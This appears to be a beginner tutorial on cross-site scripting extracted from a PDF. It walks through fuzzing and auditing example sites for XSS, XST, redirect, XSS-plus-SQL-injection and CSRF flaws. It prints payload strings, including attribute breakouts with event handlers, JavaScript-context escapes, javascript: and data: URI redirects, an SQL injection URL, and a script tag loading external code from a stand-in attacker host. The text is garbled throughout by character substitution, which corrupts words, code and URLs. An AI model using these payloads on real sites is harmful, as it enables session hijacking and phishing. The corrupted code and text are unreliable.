Dear reader, I hope that you will enjoy this paper I have written, aimed at mostly beginners within

Web Application Security, but also those that needs a quick reference or a good guide to what SS is in its simplest form! "ou may copy, distribute, share, adapt, change and edit as you like! "ou may however #$% sell this paper but including any contents in course ware, live and online training is allowed! &est regards, 'a e ___-:: Disclaimer ::-____________ &y reading this disclaimer you acknowledge that the contents below are for educational purposes only! %his tutorial does #$% contain actual attack code so you(ll have to make that up yourself! )urthermore, there is a lot more to *ross Site Scripting than just this article and there are many useful resources on the Internet including some of those in the references in the bottom of this article!

___ -:: Introduction ::- ____________ What is SS and what does it refer to+ SS aka *ross Site Scripting is a client,side attack where an attacker can craft a malicious link, containing script, code which is then e-ecuted within the victim(s browser when the target site vulnerable to and injected with SS is viewed! %he script,code can be any language supported by the browser but mostly .%'/ and 0avascript is used along with embedded )lash, 0ava or Active ! In some cases where the SS vulnerability is persistent as described further below, the attacker will not have to craft a link as the injected script is inserted directly into the target site and 1 or web application! %he target user2s3 still has to view the affected site 1 page where the injected code is located though! What can *ross Site Scripting be used for+ *ross Site Scripting can be used for a variety of things, such as session,hijacking, browser attacks, phishing, propaganda and even worms4 .owever it still requires the victim to click a malicious link created by the attacker or browse a page with injected code! Additionally, it is also possible to e-ecute 5.5 code in some cases depending on the Web Application but also how the SS payload 2script3 is written! %his requires a good understanding of 0avaScript but also the target Web Application as well! .ow could an attacker get a victim to click a SS,link+ %he easiest way to get people to click malicious links is to make them look authentic and non, malicious! 6iving them a reason afterward is the social,engineering part which should be easy e-cept if the victim is aware of such attacks and 1 or has measures against *ross Site Scripting, such as #oScript!

5age 7 1 8

.ow does an attacker avoid SS,links looking suspicious+ %his is typically done with encoding, short url services, redirects and even flash4 )urthermore, in case some .%'/ tags are allowed on a target site, actual 9:/s can be hidden somewhat from the user, i!e! on many forums it is possible to craft a link this way; <9:/=http;11vulnerablesite!tld1inde-!php+call=>script?alert2( SS(3@>1script?A)ree %,shirts4<19:/A 2 See %he 1B SS$: B1 link in the bottom for the most common ways to encode 0avaScript! 3 What types of *ross Site Scripting are there+ %he most common types are 6C%, and 5$S%,based SS! .owever *ross Site Scripting can also be triggered via cookies! 2 SS can e-ist in 9ser,Agents too but this is not easy to trigger!3 Additionally there is persistent and non,persistent SS, where the non,persistent has to be triggered via a 9:/ or via another site redirecting the SS,request to the target vulnerable site for the user 2e!g! via short url services3! %he persistent SS can be triggered just by browsing a Web Application with code injected into it! 2%his depends on which page has code injected, in case the target is not globally affected on all pages loaded by the user!3 What is the difference between 6C%, and 5$S%, SS+ %he difference is that when 6C%,requests are used it is possible to conduct the usual SS attacks where an attacker sends a maliciously crafted 9:/ to the victim which is then e-ecuted when the victim opens the link in the browser! With 5$S%,requests, an attacker could e!g! use flash to send the victim to the 5$S%, SS vulnerable site since it is not possible to create a 9:/ where 5$S%,requests are in use! .owever, 0avaScript can also be used to create a 5$S%,based SS request! 2%his requires the user to view this 0avaScript some way, which then sends the 5$S%,based SS request!3 Are there sub,categories of *ross Site Scripting+ At the moment there(s SS: and SSD/I! $ne could say that S:)1*S:) belongs to the same category, however the attack method differs too much from traditional *ross Site Scripting! SS: or *SS: aka *ross Site Script :edirection is used to redirect a victim to another page unwillingly! %he page can for e-ample contain a phishing template, browser attack code or in some cases where the data or javascript 9:I scheme is used; session,hijacking! SSD/I is a mi- of *ross Site Scripting and SD/ Injection, where an unknowing victim visits a malicious link containing SD/ Injection instructions for an area on the website which requires privileges that guests or members doesn(t have! S:) or *S:) 2sometimes referred to as *,Surf3 stands for *ross Site :equest )orgery which is used to send automated input via the user to the target site! S:) can in some cases be triggered just by viewing a specially crafted image tag! With *ross Site :equest )orgery it may be possible to e!g! alter the password of the victim if the target site is not secured properly with Anti,*S:) tokens etc! 2%his prevents these automated requests!3 What is S% and can it be used for anything+ S% also known as *ross Site 2Script3 %racing is a way of abusing the .%%5 %race 2Debug3 protocol! Anything that an attacker sends to a web,server that has %:A*C enabled will send the same answer back! If an attacker sends the following;

5age E 1 8

Code: %:A*C 1 .%%517!F .ost; target!tld *ustom,header; >script?alert2F3>1script? %he attacker will receive the same G*ustom,header; >scr!!!G back allowing script e-ecution! .owever after recent browser updates the following year2s3 S% has been increasingly harder to control and e-ecute properly! .ow is it possible to find SS bugs within websites+ %here are E methods; code 1 script auditing or fuHHing which is described further below! What kind of tools is required to find SS bugs+ 2:CD = :equired, $5% = $ptional3 , :CD; An Internet &rowser 2such as )ire)o-3 in case you(re fuHHing! 2It is possible to do with netcat, but not advisable!3 , :CD; A te-t,viewer 2such as notepad, scite, nano etc!3 in case you(re auditing! , $5%; An intercepting pro-y in case you(re doing more advanced SS! 2In )ire)o- it is possible to use %amper Data however &urp Suite is generally better in the long run!3 , $5%; &rowser Addons, for )ire)o- the following are especially useful; )irebug, /ive.%%5 .eaders, Add (#( Cdit *ookies, :ef*ontrol, %amper Data and more! What else is useful to know if $ne wants to find SS bugs+ , &rowser limitations regarding *ross Site Scripting <7A , .%%5 .eaders and how the .%%5 protocol works! , .%'/ I 0avascript and perhaps embedded script attacks! 2flash etc!3 , Intercepting pro-ies 2&urp etc!3, differential tools 2meld, C-amDiff, diff, grep, etc!3 , 9seful browser,addons 2see )ire*at <JA3 , Website scanners 2#ikto, WJA), 6rendel, Dirbuster, etc!3 Where is SS,bugs typically located+ It is usually located in user submitted input either via 6C%, or 5$S%,requests, where it is reflected on the target site as te-t outside tags, inside tag values or within javascript! It can also in some cases be submitted via cookies, http headers or in rare cases file uploads! 2I!e! filenames has been possible3 .ow does $ne protect a site against SS+ %he best way is to ensure that all user input and output is validated and sanitiHed properly! .owever in some cases an I5S or WA) can also protect against SS though the best way is still to validate 2and sanitiHe3 the user,input and ,output properly! :elying on magicKquotes and other php!ini setting is generally a bad idea and not considered Gbest practiceG options! ___ -:: Finding the Bug - With Fuzzing ::- ____________ <CAS"A C-ample *ase , A; We(re at http;11buggysite!tld where we see a GSearch,fieldG in the top,right! Since we don(t know the real source code but only the .%'/,output of the site we will have to fuHH anything where it is possible to submit data! 5age J 1 8

In some cases the data will be reflected on the site and in some cases it wont! If it doesn(t we move on to the ne-t cookie, header, 6C% 1 5$S% request or whatever it is that we are fuHHing! %he most effective way to fuHH is not to write; >script?alert2F3>1script? since many sites has different precautions against *ross Site Scripting! Instead we create a custom string which in most cases wont trigger anything that might alter the output of the site or render error pages that aren(t vulnerable! An e-ample of an effective string could be; Gkeyword(1L?> G ( 1L ? and > are the most commonly used html characters used in *ross Site Scripting! .owever if we want to be really thorough then we could also add 32A<MNO to the string that we are using to fuHH the target site! %he reason why there(s not two of G or ( is because this can trigger a WA), I5S or whatever precaution the site might have tried to implement against SS instead of using a secure coding scheme 1 plan 1 development cycle! %he reason why all characters are written as ?> instead of >? is because this is a common bypass against SS,filters4 With that in mind, we use the following string; Gha--or(1L?> to fuHH the search,field; /ets take a look at the returned .%'/,code; HTML Code: !!! >input type=Gte-tG name=GsearchG value=GPquot@ha--or(1LPgt@Plt@G 1? >br 1? "ou searched for LGha--orL(1LL?> which returned no results! !!! As we can see the input tag encoded our fuHHing string correct, however the te-t afterwards did not encode it properly as it only added slashes which is completely useless against *ross Site Scripting in this case! &y submitting the following string we can SS their website; >script?alert2F3>1script? or perhaps >script src=http;11hQ-Fr!tld1-ss!js?>1script? $f course we don(t know if the following characters ; 2 3 and ! are filtered but in most cases they(re not! $ur final SS,url could be; http;11buggysite!tld1search!php+query=>script?alert2F3>1script? if 6C%, requests are used! <CAS"A C-ample *ase , &; We(re at http;11yetanothersite!tld where we see another search formular! %he following is returned after our string is submitted to the search field;

5age Q 1 8

HTML Code: !!! >input type=Gte-tG name=GsearchG value=GLGha--orL(1LL?>G 1? >br 1? "ou searched for Pquot@ha--or(1LPgt@Plt@ which returned no results! !!! In this case the string after the tag, encoded the string properly! .owever the string inside the tag only had slashes added which does nothing in this case! &asically we can bypass this easily with; G?>script?alert2F3>1script? If we(re going to load e-ternal javascript we will have to avoid using G and ( of course! $ur final SS,url could be; http;11yetanothersite!tld1search!php+query=G?>script?alert2F3>1script? if 6C%,requests are used! <'$DC:A%CA C-ample *ase , *; We(re at http;11prettysecure!tld where we find yet another search field, it(s time to submit our fuHHing string! %he following .%'/,code is returned after our string is submitted; HTML Code: !!! >input type=Gte-tG name=GsearchG value=GPquot@ha--or(1LPgt@Plt@G? "ou searched for GPquot@ha--or(1LPgt@Plt@G which returned no results! !!! 2further down3 >script? !!! s!prop7=GprettysecureG@ s!propE=GLGha--orOJR1LOJCOJ*G@ s!propJ=GadspaceG@ !!! >1script? )or most people this might look secure but it really isn(t! A lot of people also overlooks potential *ross Site Scripting vectors if their string >script?alert2F3>1script? is either not output directly or encoded where they e-pect the SS bug to be! %his is why it is important to use a keyword that doesn(t e-ist on the site, such as ha--or or something better! %he reason why a keyword is used is because it is searchable almost always! "ou can call it a SS,locator! <7A Anyway, back to our e-ample! s!propE=GLGha--orOJR1LOJCOJ*G@ looks secure but the flaw is that backspace aka L is not filtered, escaped or encoded correctly! So if we write; LG it will become LLG, which will escape the first L but not our quote! As you can see, we can(t use tags either so we(ll have to use javascript and no hard brackets 2unless we use javascript, to create these for us which is possible in numerous amounts of ways3! 5age S 1 8

We have of course checked that soft brackets 2 3 are #$% filtered! 2in some cases they can be3! &y entering the following string we are able to create an alert bo-; LG@ alert2F3@ s!propSFF=LG %his will become; s!propE=LLG@ alert2F3@ s!propSFF=LLG when we submit the string! %he reason why we add the s!propSFF=LG variable to our string is because the javascript will most likely #$% e-ecute if we don(t! We could also use comments so instead of s!propSFF=LG we just use 11 in the end of the string! 2Whenever SS is located within 0avaScript, try to finish the script so the rest will e-ecute properly! %hink and perform this way since it will help to understand how the page functions as well without breaking it!3 In this case it is also possible to e-ecute e-ternal javascript if $ne uses a bit more advanced javascript! In order to do this we can use document!write2String!from*har*ode233@ where you will need a decimal converter! <%he SS$:A $ur final SS,url could be; http;11prettysecure!tld1search!php+query=LG@ alert2F3@ s!propSFF=LG ___ -:: Finding the Bug - With Auditing ::- ____________ <CAS"A C-ample *ase , A; %he following file 2inde-!php3 has some interesting code; H Code: !!! if2TK6C%<(viewKprofile(A==73 N echo TK6C%<(name(A@ !!! 2more code3 M !!! &y looking at the above code we can see that if viewKprofile is equal to 7 then the script prints the GnameG variable! An e-ample attack 9:/ could look like; http;11testH!tld1inde-!php+ viewKprofile=7Pname=>script?alert2F3>1script? <.A:DA C-ample *ase , &; %he following file 2search!php3 has some interesting code; H Code: !!! if2TK6C%<(setKflag(A==73 N Tvar = GcheckedG@ M echo G>input type=(radio( value=(flag( checked=(G! htmlentities2Tvar3 !G( 1?G@ !!! 5age U 1 8

%his is a conditional vulnerability where registerKglobals in php!ini has to be set to $n! 2$ff is factory default3! :egisterK6lobals basically allows the user to set variables on the fly via the browser, even if they are not meant to be set! %his only applies to variables that are #$% set as in the e-ample above! Another problem we have encountered is htmlentities however due to a coding error we can still abuse the tag without creating a new! We will need to use event handlers in the >input? tag and some *SS 2*ascading Style Sheet3 to make sure that the victim triggers the eventhandler no matter what! %here(s multiple ways of doing that, one of them is; HTML Code: style=(display;block@width;RRRRRp-@height;RRRRRp-@( An eventhandler that we could use in this case could be onmouseover, even though onblur might be better! "ou might ask yourself, why is the above script not secure+ &ecause htmlentities23 used that way is insecure, due to that the tag looks like this in html form; >input type=(radio( value=(flag( checked=(Tvar( 1? Inside the checked value our variable 2Tvar3 is encoded, but only G ? and > are encoded, not ( due to C#%KD9$%CS were not set in the htmlentities function! %his means that we can break out of checked=(( easily! An e-ample attack 9:/ could be; http;11was,secure!tld1search!php+test=( style=(display;block@width;RRRRRp-@height;RRRRRp-@ ( onmouseover=(alert2F3 %here is no GC-ample *ase , *G since I have gone through most the important of *ross Site Scripting! ___ -:: Additional In!ormation ::- ____________ SS: When it is possible to send a user to the data or javascript 9:I scheme either via A3 6C%, or 5$S%, requests or &3 9ser submitted content such as a link then the SS: category applies to the bug! .owever some individuals has claimed that a site that only accepts .%%5 or .%%5S links via 6C%, requests also falls under the SS: category! An e-ample of SS: could be; http;11somesite!tld1redirect!php+ link=data;te-t1html,>script?alert2F3>1script? And if the 0avascript 9:I scheme is used; http;11somesite!tld1redirect!php+link=javascript;alert2F3@ %his has in some cases been known to leak cookies and is therefore used in session,hijacking! Additionally being able to use the javascript 9:I scheme in image tags on forums can be abused as well though not all browsers accepts this, but generally Internet C-plorer does! 2i!e! >img src=Gjavascript;alert2(C-ploit,D& :ocks4(3@G 1? 5age V 1 8

SSD/I When a SD/ Injection vulnerability e-ists within a privileged area of the target site, SSD/I becomes plausible! An e-ample of SSD/I could be tricking the administrator of Gshouldbesecure!tldG to click either the SD/ Injection link or click a *ross Site Scripting link which contains a call to the SD/ Injection in the privileged area of the site where this could be the vulnerable part; http;11shouldbesecure!tld1admin!php+ del=7 A#D 7=71B S:) Also known as *S:) and *,Surf, can be used against sites that doesn(t use tokens which are usually hidden inside tags! A common way to use tokens against *,Surf attacks is to hide them inside tags like; HTML Code: >input type=GhiddenG name=Ganti,csrfG value=Grandom token valueG 1? If the tokens are not random enough it might be possible to calculate these and still use *,Surf in an attack! )urthermore, if SS is present at the target site it may also be possible to use *ross Site Scripting to read these Anti,*S:) values and thereby use them into performing automated request and bypass this protection! ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; "e!erences: <7A http;11ha!ckers!org1-ss!html <EA http;11en!wikipedia!org1wiki1*ross,siteKscripting <JA http;11firecat!internFt!net1 #se!ul Tools and $ther %ites: < SS CncoderA http;11internFt!net1-ssor1 <$nline Self,%est 5ageA http;11internFt!net1-sstutorial1 < SS 5o* *reatorA http;11internFt!net1utube1 <C-ploit,D& &logA http;11www!e-ploit,db!com1category1ma-e1 <Wideos 1 Demo(sA http;11www!youtube!com1user1ma-elJgJnd <.%%5 $ptionsA http;11attacks!internFt!net1htopt1 < SS %raceA http;11attacks!internFt!net1-strace1

5age 8 1 8